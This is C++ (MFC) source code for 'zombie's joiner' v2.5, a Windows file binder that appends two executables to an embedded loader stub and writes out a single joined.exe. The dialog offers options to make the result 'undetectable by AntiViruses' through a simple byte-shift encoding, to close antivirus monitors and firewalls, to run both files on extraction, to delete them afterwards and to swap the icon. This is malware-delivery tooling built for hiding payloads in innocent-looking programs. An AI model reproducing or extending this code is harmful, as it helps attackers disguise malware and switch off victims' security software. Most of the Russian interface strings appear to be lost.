// Joiner 2 (c) 2002 z0mbie  [ zombie@freenet.am ]
// http://zomby.tk

#include "stdafx.h"
#include "joiner.h"
#include "joinerDlg.h"
#include "AboutDlg.h"
#include <share.h>

#ifdef _DEBUG
#define new DEBUG_NEW
#undef THIS_FILE
static char THIS_FILE[] = __FILE__;
#endif

typedef short int SINT;

void SetBit(unsigned int & bitfield,int bitn,BOOL value){

	if(value) bitfield|=(int)(1<<bitn);
 	else bitfield&=(int)(pow(2,sizeof(bitfield)*8)-(1<<bitn));
 	
}


CJoinerDlg::CJoinerDlg(CWnd* pParent /*=NULL*/)
	: CDialog(CJoinerDlg::IDD, pParent)
{
	//{{AFX_DATA_INIT(CJoinerDlg)
	m_strfile1 = _T("");
	m_strfile2 = _T("");
	m_strresult = _T("");
	m_bexec1 = FALSE;
	m_bexec2 = FALSE;
	m_bund = FALSE;
	m_bdelfiles = FALSE;
	m_bclav = FALSE;
	m_bclfws = FALSE;
	m_strIconPath = _T("");
	m_bChIcon = FALSE;
	//}}AFX_DATA_INIT
	// Note that LoadIcon does not require a subsequent DestroyIcon in Win32


	m_hIcon = AfxGetApp()->LoadIcon(IDR_MAINFRAME);
	m_pTips=NULL;
}

void CJoinerDlg::DoDataExchange(CDataExchange* pDX)
{
	CDialog::DoDataExchange(pDX);
	//{{AFX_DATA_MAP(CJoinerDlg)
	DDX_Control(pDX, IDC_BROWSE_ICON, m_BrowseIconBtn);
	DDX_Control(pDX, IDC_ICONPATH, m_IconEdit);
	DDX_Control(pDX, IDC_RADIO1, m_radio);
	DDX_Control(pDX, IDC_CLFW, m_clfwbtn);
	DDX_Control(pDX, IDC_BROWSE_SAVEAS_BUTTON3, m_resultbtn);
	DDX_Control(pDX, IDC_BROWSE_BUTTON2, m_brows2);
	DDX_Control(pDX, IDC_BROWSE_BUTTON1, m_brows1);
	DDX_Control(pDX, IDC_CLAV, m_clavcb);
	DDX_Control(pDX, IDC_UNDETECTABLE, m_undcb);
	DDX_Control(pDX, IDCANCEL, m_exitbtn);
	DDX_Control(pDX, IDC_ABOUT, m_aboutbtn);
	DDX_Control(pDX, IDC_JOIN_BUTTON, m_joinbtn);
	DDX_Text(pDX, IDC_EDIT_FILE1, m_strfile1);
	DDX_Text(pDX, IDC_EDIT_FILE2, m_strfile2);
	DDX_Text(pDX, IDC_EDIT1_SAVEAS, m_strresult);
	DDX_Check(pDX, IDC_EXEC1, m_bexec1);
	DDX_Check(pDX, IDC_EXEC2, m_bexec2);
	DDX_Check(pDX, IDC_UNDETECTABLE, m_bund);
	DDX_Check(pDX, IDC_DELFILES, m_bdelfiles);
	DDX_Check(pDX, IDC_CLAV, m_bclav);
	DDX_Check(pDX, IDC_CLFW, m_bclfws);
	DDX_Text(pDX, IDC_ICONPATH, m_strIconPath);
	DDX_Check(pDX, IDC_CHICON, m_bChIcon);
	//}}AFX_DATA_MAP
}

BEGIN_MESSAGE_MAP(CJoinerDlg, CDialog)
	//{{AFX_MSG_MAP(CJoinerDlg)
	ON_WM_PAINT()
	ON_WM_QUERYDRAGICON()
	ON_BN_CLICKED(IDC_JOIN_BUTTON, OnJoinButton)
	ON_BN_CLICKED(IDC_BROWSE_BUTTON1, OnBrowseButton1)
	ON_BN_CLICKED(IDC_BROWSE_BUTTON2, OnBrowseButton2)
	ON_BN_CLICKED(IDC_BROWSE_SAVEAS_BUTTON3, OnBrowseSaveasButton3)
	ON_EN_CHANGE(IDC_EDIT_FILE1, OnChangeEditFile1)
	ON_EN_CHANGE(IDC_EDIT_FILE2, OnChangeEditFile2)
	ON_BN_CLICKED(IDC_EXEC1, OnExec1)
	ON_BN_CLICKED(IDC_EXEC2, OnExec2)
	ON_BN_CLICKED(IDC_UNDETECTABLE, OnUndetectable)
	ON_BN_CLICKED(IDC_ABOUT, OnAbout)
	ON_BN_CLICKED(IDC_DELFILES, OnDelfiles)
	ON_BN_CLICKED(IDC_CLAV, OnClav)
	ON_WM_LBUTTONDOWN()
	ON_BN_CLICKED(IDC_CLFW, OnClfw)
	ON_BN_CLICKED(IDC_RADIO1, OnRadio1)
	ON_BN_CLICKED(IDC_RADIO2, OnRadio2)
	ON_BN_CLICKED(IDC_RADIO3, OnRadio3)
	ON_BN_CLICKED(IDC_RADIO4, OnRadio4)
	ON_BN_CLICKED(IDC_CHICON, OnChicon)
	ON_BN_CLICKED(IDC_BROWSE_ICON, OnBrowseIcon)
	ON_BN_CLICKED(IDC_ENGLISH, OnEnglish)
	ON_BN_CLICKED(IDC_RUS, OnRus)
	//}}AFX_MSG_MAP
END_MESSAGE_MAP()

BOOL CJoinerDlg::OnInitDialog(){
	
	CDialog::OnInitDialog();

	// Set the icon for this dialog.  The framework does this automatically
	//  when the application's main window is not a dialog
	SetIcon(m_hIcon, TRUE);			// Set big icon
	SetIcon(m_hIcon, FALSE);		// Set small icon

	char buf[MAX_PATH];
	GetCurrentDirectory(MAX_PATH,buf);
	m_strresult.Format("%s\\joined.exe",buf);

	m_bexec1=1;
	m_bexec2=1;
	m_bund=1;
	m_bdelfiles=0;
	m_radio.SetCheck(1);
	IconOffset=0;
	extrdir=1;
	//m_joinbtn.SetBitmap(::LoadBitmap(AfxGetResourceHandle(),MAKEINTRESOURCE(IDB_BITMAP2)));
	//m_aboutbtn.SetBitmap(::LoadBitmap(AfxGetResourceHandle(),MAKEINTRESOURCE(IDB_BITMAP3)));
	//m_exitbtn.SetBitmap(::LoadBitmap(AfxGetResourceHandle(),MAKEINTRESOURCE(IDB_BITMAP4)));
	InitInterface();

	if (!m_pTips){
		m_pTips =new CToolTipCtrl;
		m_pTips->Create(this);
		m_pTips->AddTool(&m_undcb,"this will make joined file undetectable only to antivirus SCANNERS, not monitors");
		m_pTips->AddTool(&m_clavcb,"this will close antivirus monitors(almost all) before extracting files");
		m_pTips->AddTool(&m_clfwbtn,"this will close FireWalls(almost all) before extracting files");
		m_pTips->AddTool(&m_brows1,"browse");
		m_pTips->AddTool(&m_brows2,"browse");
		m_pTips->AddTool(&m_resultbtn,"the name of joined file");
//		m_pTips->AddTool(&m_extrdirbtn,"not recommended , i don\'t know why i added this option :]");
		m_pTips->Activate(TRUE);
	}
	
	m_msg_done= "done !";
	m_msg_nofiles="seems like u've forgotten something";
	m_msg_fileerror="seems like one of selected files cannot be opened ";
	m_msg_iconerr="this file doesn\'t contain 32x32 16 color icon";
	m_msg_iconfileerr="cannot open icon file";
	m_msg_working="working..";
	m_msg_exiting="exiting..";

	UpdateData(0);
	
	return TRUE;  // return TRUE  unless you set the focus to a control
}

void CJoinerDlg::OnPaint() 
{
	if (IsIconic())
	{
		CPaintDC dc(this); // device context for painting

		SendMessage(WM_ICONERASEBKGND, (WPARAM) dc.GetSafeHdc(), 0);

		// Center icon in client rectangle
		int cxIcon = GetSystemMetrics(SM_CXICON);
		int cyIcon = GetSystemMetrics(SM_CYICON);
		CRect rect;
		GetClientRect(&rect);
		int x = (rect.Width() - cxIcon + 1) / 2;
		int y = (rect.Height() - cyIcon + 1) / 2;

		// Draw the icon
		dc.DrawIcon(x, y, m_hIcon);
	}
	else
	{
		CDialog::OnPaint();
	}
}

// The system calls this to obtain the cursor to display while the user drags
//  the minimized window.
HCURSOR CJoinerDlg::OnQueryDragIcon()
{
	return (HCURSOR) m_hIcon;
}


// [Join] button clicked
void CJoinerDlg::OnJoinButton() { // main code :]
	
	
	UpdateData(1);
    
    // check4errors

	if(m_strresult=="" || m_strfile1=="" || m_strfile2=="") {
		AfxMessageBox(m_msg_nofiles); //"seems like u've forgotten something"
		m_joinbtn.SetWindowText("||[  JOIN  ]||");
		m_joinbtn.EnableWindow(1);
		return;
	}

	if( (!access(m_strresult,00) && access(m_strresult,04)) || access(m_strfile1,04) || access(m_strfile2,04) ) {
		AfxMessageBox(m_msg_fileerror);//"seems like one of selected files cannot be opened "
		m_joinbtn.SetWindowText("||[  JOIN  ]||");
		m_joinbtn.EnableWindow(1);
		return;
	}

	if(access(m_strIconPath,04)&& m_bChIcon) {
		AfxMessageBox(m_msg_iconfileerr); //"cannot open icon file"
		m_joinbtn.SetWindowText("||[  JOIN  ]||");
		m_joinbtn.EnableWindow(1);
		return;
	}

    // start working

	m_joinbtn.SetWindowText(m_msg_working); // "working.."
	m_joinbtn.EnableWindow(0);

	
	// extract loader from resources
	
	HRSRC rc=NULL;
	rc=FindResource(AfxGetResourceHandle(),MAKEINTRESOURCE(IDR_RT_EXE1),"RT_EXE");
	DWORD dwSize;

	//DeleteFile(m_strresult);
	if (rc!=NULL){
		
		HGLOBAL hgl=NULL;
		dwSize = SizeofResource(AfxGetResourceHandle(), rc);
		hgl=LoadResource(AfxGetResourceHandle(),rc);
		if (hgl!=NULL){
			CFile cf;
			cf.Open(m_strresult, CFile::modeCreate | CFile::modeWrite);
			cf.WriteHuge(hgl,dwSize);
			cf.Close();
			FreeResource(hgl);
		
		}
	}


	//TODO: place this in separate file and #include here and in joined.cpp
	// although this struct isn't changed frequently :]
	struct RECORD { long file1;long file2;unsigned int flags;short int dir;char ext1[5];char ext2[5];} info;
	enum OPTIONS {EXEC1,EXEC2,UNDETECTABLE,DELFILES,CLAV,CLFW};
	
	// fill struct with settings

	//get extensions of selected files
	_splitpath(m_strfile1,NULL,NULL,NULL,info.ext1);
	_splitpath(m_strfile2,NULL,NULL,NULL,info.ext2);
	
	//set flags
	info.flags=0; 
	if(m_bexec1) SetBit(info.flags,EXEC1,1);
	if(m_bexec2) SetBit(info.flags,EXEC2,1);
	if(m_bund) SetBit(info.flags,UNDETECTABLE,1);
	if(m_bdelfiles) SetBit(info.flags,DELFILES,1);
	if(m_bclav) SetBit(info.flags,CLAV,1);
	if(m_bclfws) SetBit(info.flags,CLFW,1);
	info.dir=extrdir;

	info.file1=0;
	info.file2=0;

	
	char c;
	ifstream fin;

	// bind 1st file
	fin.open(m_strfile1,ios::nocreate|ios::binary);
	ofstream fout(m_strresult,ios::app|ios::binary);
	while(fin.get(c)) {
		fout.put((char)(c+m_bund));
		info.file1++;
	}
	fin.close();

	// bind 2nd file
	fin.open(m_strfile2,ios::nocreate|ios::binary);
	while(fin.get(c)) {
		fout.put((char)(c+m_bund));
		info.file2++;
	}
	fin.close();

	// write settings to end of file
	FILE* file=_fsopen(m_strresult,"ab",SH_DENYNO);
	//fseek(file,0,SEEK_END);
	fwrite( &info, sizeof(info), 1, file );


	//--------change icon
	if(m_bChIcon){


		FILE* ic=fopen(m_strIconPath,"r");
		fseek(ic,IconOffset,SEEK_SET);
		//fclose(file);
		FILE* f=fopen(m_strresult,"r+");

		// ATTENTION !  offset(0xea4) is hardcoded, it can change
		// TODO: change this - determine offset by going through PE structure
		// (but i'm too lazy to do it :]. the game isn't worth the candle)

		fseek(f,0xea4,SEEK_SET); //fseek to offset of icon: 28 00 00 00 20 00....
		for(int i=0;i<743;i++) fputc(fgetc(ic),f);

		fclose(ic);
		fclose(f);


	}


	AfxMessageBox(m_msg_done);

	//m_joinbtn.SetWindowText("||[  JOIN  ]||");  
	//m_joinbtn.EnableWindow(1);
	//fclose(file);  // ???
	
	m_joinbtn.SetWindowText("exiting..");
	Sleep(100);
	CDialog::OnOK();

}

//select 1st file
void CJoinerDlg::OnBrowseButton1(){
	
	CFileDialog fd(true,NULL,NULL,OFN_OVERWRITEPROMPT,"ANY file|*.*||");
	if (fd.DoModal()==IDOK){
		m_strfile1=fd.m_ofn.lpstrFile;
		UpdateData(0);
	}	
	
}

//select 2nd file
void CJoinerDlg::OnBrowseButton2(){
	CFileDialog fd(true,NULL,NULL,OFN_OVERWRITEPROMPT,"ANY file|*.*||");

	if (fd.DoModal()==IDOK){
		m_strfile2=fd.m_ofn.lpstrFile;
		UpdateData(0);
		}	
}

//choose icon file
void CJoinerDlg::OnBrowseIcon() {

	CFileDialog fd(true,NULL,NULL,OFN_OVERWRITEPROMPT,"Icon files|*.ico|All files|*.*||");

	if (fd.DoModal()==IDOK) 
		m_strIconPath=fd.m_ofn.lpstrFile;	
	else return;
	
	
	struct ICH {SINT res;SINT type;SINT count;} ih;
	struct ENTRY {char width;char height;char colors;char res;SINT planes;SINT bitcount;UINT size;UINT offset;} entry;
	FILE* ic=fopen(m_strIconPath,"r");
	fread(&ih,1,sizeof(ih),ic);


	long int offset=0;
	for(int i=0;i<ih.count;i++){
		fread(&entry,1,sizeof(entry),ic);
		//only 16 colors 32x32 icons r supported.. yet :]
		if(entry.colors==16 && entry.width==32 && entry.height==32) IconOffset=entry.offset;
	}
	fclose(ic);

	if (!IconOffset) {
		MessageBox(m_msg_iconerr,"error with icon file! :[");
		m_strIconPath="";
	}


	UpdateData(0);
}

//choose result file
void CJoinerDlg::OnBrowseSaveasButton3(){
	char drv[10];
	char dir[200];
	char file[100];
	char tmp[300];
	CFileDialog fd(false,NULL,NULL,OFN_OVERWRITEPROMPT,"eXecutable files(*.exe)|*.exe||");
	if (fd.DoModal()==IDOK) m_strresult=fd.m_ofn.lpstrFile;
	_splitpath(m_strresult,drv,dir,file,NULL);
	_makepath(tmp,drv,dir,file,"exe");
	m_strresult=tmp;
	UpdateData(0);	
}

void CJoinerDlg::OnOK(){}
void CJoinerDlg::OnChangeEditFile1() {UpdateData(1);}
void CJoinerDlg::OnChangeEditFile2(){UpdateData(1);}
void CJoinerDlg::OnExec1(){UpdateData(1);}
void CJoinerDlg::OnExec2(){UpdateData(1);}
void CJoinerDlg::OnExtrdir(){UpdateData(1);}
void CJoinerDlg::OnUndetectable(){UpdateData(1);}
void CJoinerDlg::OnDelfiles(){UpdateData(1);}
void CJoinerDlg::OnClav(){UpdateData(1);}
void CJoinerDlg::OnClfw(){UpdateData(1);}

void CJoinerDlg::OnChicon(){
	
	UpdateData(1);
	if(m_bChIcon){
		::EnableWindow(m_IconEdit.GetSafeHwnd( ),1);
		::EnableWindow(m_BrowseIconBtn.GetSafeHwnd( ),1);
	}else{
		::EnableWindow(m_IconEdit.GetSafeHwnd( ),0);
		::EnableWindow(m_BrowseIconBtn.GetSafeHwnd( ),0);
	}
}


void CJoinerDlg::OnAbout(){
	
	SetWindowText("wow! :] u clicked it"); 
	CAboutDlg dlg;
	dlg.DoModal();
	SetWindowText("|[zombie's joiner]|   v 2.5");
	
}




void CJoinerDlg::OnLButtonDown(UINT nFlags, CPoint point){ // make window draggable
	CDialog::OnLButtonDown(nFlags, point);
	ReleaseCapture();
	::SendMessage(AfxGetApp()->m_pMainWnd->GetSafeHwnd(),WM_SYSCOMMAND,SC_MOVE|HTCAPTION,0);
}

BOOL CJoinerDlg::PreTranslateMessage(MSG* pMsg){ 
	
	if (NULL != m_pTips)  m_pTips->RelayEvent(pMsg); // tooltips
	return CDialog::PreTranslateMessage(pMsg);
}


void CJoinerDlg::OnRadio1(){extrdir=1;}
void CJoinerDlg::OnRadio2(){extrdir=3;} 
void CJoinerDlg::OnRadio3(){extrdir=2;} 
void CJoinerDlg::OnRadio4(){extrdir=4;} 


void CJoinerDlg::InitInterface(){


	elements[0]=GetDlgItem(IDC_STATIC_INTF);

	elements[1]=GetDlgItem(IDC_STATIC_FILE1);
	elements[2]=GetDlgItem(IDC_STATIC_FILE2);
	elements[3]=GetDlgItem(IDC_STATIC_ICON);
	elements[4]=GetDlgItem(IDC_CHICON);
	elements[5]=GetDlgItem(IDC_STATIC_FILES);
	
	elements[6]=GetDlgItem(IDC_STATIC_OPTIONS);
	elements[7]=GetDlgItem(IDC_EXEC1);
	elements[8]=GetDlgItem(IDC_EXEC2);
	elements[9]=GetDlgItem(IDC_UNDETECTABLE);
	elements[10]=GetDlgItem(IDC_DELFILES);
	elements[11]=GetDlgItem(IDC_CLAV);
	elements[12]=GetDlgItem(IDC_CLFW);

	elements[13]=GetDlgItem(IDC_STATIC_DEST);
	elements[14]=GetDlgItem(IDC_RADIO1);
	elements[15]=GetDlgItem(IDC_RADIO2);
	elements[16]=GetDlgItem(IDC_RADIO3);
	elements[17]=GetDlgItem(IDC_RADIO4);
	
	elements[18]=GetDlgItem(IDC_JOIN_BUTTON);
	elements[19]=GetDlgItem(IDC_ABOUT);
	elements[20]=GetDlgItem(IDCANCEL);
	elements[21]=GetDlgItem(IDC_ENGLISH);
	elements[22]=GetDlgItem(IDC_RUS);
	elements[23]=GetDlgItem(IDC_STATIC_RESULT);
}



// i know, this's not the best way of making multilingual interfaces :]

void CJoinerDlg::OnEnglish() {
	
	SetWindowText("|[zombie's joiner]|   v 2.5"); // title
	
	//dialog elements
	elements[0]->SetWindowText("interface");
	elements[1]->SetWindowText("file #1:");
	elements[2]->SetWindowText("file #2:");
	elements[3]->SetWindowText("icon file:");
	elements[4]->SetWindowText("change icon");
	elements[5]->SetWindowText("files");
	elements[6]->SetWindowText("Options");
	elements[7]->SetWindowText("open file #1 after extracting");
	elements[8]->SetWindowText("open file #2 after extracting");
	elements[9]->SetWindowText("make undetectable by AntiViruses");
	elements[10]->SetWindowText("try to delete files after opening");
	elements[11]->SetWindowText("close AntiViruses");
	elements[12]->SetWindowText("close FireWalls");
	elements[13]->SetWindowText("extract files to:");
	//elements[14]->SetWindowText("");
	//elements[15]->SetWindowText("");
	//elements[16]->SetWindowText("");
	elements[17]->SetWindowText("Current");
	elements[18]->SetWindowText("||[  JOIN  ]||");
	elements[19]->SetWindowText("|[ ABOUT]|");
	elements[20]->SetWindowText("|[ EXIT ]|");
	elements[21]->SetWindowText("english");
	elements[22]->SetWindowText("russian");
	elements[23]->SetWindowText("result:");

	
	// tooltips
	delete m_pTips;
	m_pTips =new CToolTipCtrl;
	m_pTips->Create(this);
	m_pTips->AddTool(&m_undcb,"this will make joined file undetectable only to antivirus SCANNERS, not monitors");
	m_pTips->AddTool(&m_clavcb,"this will close antivirus monitors(almost all) before extracting files");
	m_pTips->AddTool(&m_clfwbtn,"this will close FireWalls(almost all) before extracting files");
	m_pTips->AddTool(&m_brows1,"browse");
	m_pTips->AddTool(&m_brows2,"browse");
	m_pTips->AddTool(&m_resultbtn,"the name of joined file");
	m_pTips->Activate(TRUE);
	UpdateData(0);


	//error messages
	m_msg_done="done !";
	m_msg_nofiles="seems like u've forgotten something";
	m_msg_fileerror="seems like one of selected files cannot be opened ";
	m_msg_iconerr="this file doesn\'t contain 32x32 16 color icon";
	m_msg_iconfileerr="cannot open icon file";
	m_msg_working="working..";
	m_msg_exiting="exiting..";

	//about box

	
}

void CJoinerDlg::OnRus() {
	
	SetWindowText("  2.5  (c) z0mbie"); // window title
	
	elements[0]->SetWindowText("");
	elements[1]->SetWindowText(" #1:");
	elements[2]->SetWindowText(" #2:");
	elements[3]->SetWindowText(":");
	elements[4]->SetWindowText(" ");
	elements[5]->SetWindowText("");
	elements[6]->SetWindowText("");
	elements[7]->SetWindowText("  #1  ");
	elements[8]->SetWindowText("  #2  ");
	elements[9]->SetWindowText("   yco");
	elements[10]->SetWindowText("   ");
	elements[11]->SetWindowText(" ");
	elements[12]->SetWindowText(" ");
	elements[13]->SetWindowText(" :");
	//elements[14]->SetWindowText("");
	//elements[15]->SetWindowText("");
	//elements[16]->SetWindowText("");
	elements[17]->SetWindowText("");
	elements[18]->SetWindowText("||[  ]||");
	elements[19]->SetWindowText("|[   ]|");
	elements[20]->SetWindowText("|[  ]|");
	elements[21]->SetWindowText("");
	elements[22]->SetWindowText("");
	elements[23]->SetWindowText(":");

	delete m_pTips;
	m_pTips =new CToolTipCtrl;
	m_pTips->Create(this);
	m_pTips->AddTool(&m_undcb,"     ,     . \" \"");
	m_pTips->AddTool(&m_clavcb,"     ( ) ");
	m_pTips->AddTool(&m_clfwbtn,"    ( )");
	m_pTips->AddTool(&m_brows1,"");
	m_pTips->AddTool(&m_brows2,"");
	m_pTips->AddTool(&m_resultbtn,"  ");
	m_pTips->Activate(TRUE);



	//error messages
	m_msg_done="oo !";
	m_msg_nofiles="    ?";
	m_msg_fileerror="    ";
	m_msg_iconerr="   16-   32x32 ";
	m_msg_iconfileerr="   ";
	m_msg_working="..";
	m_msg_exiting="..";


	UpdateData(0);
	
}

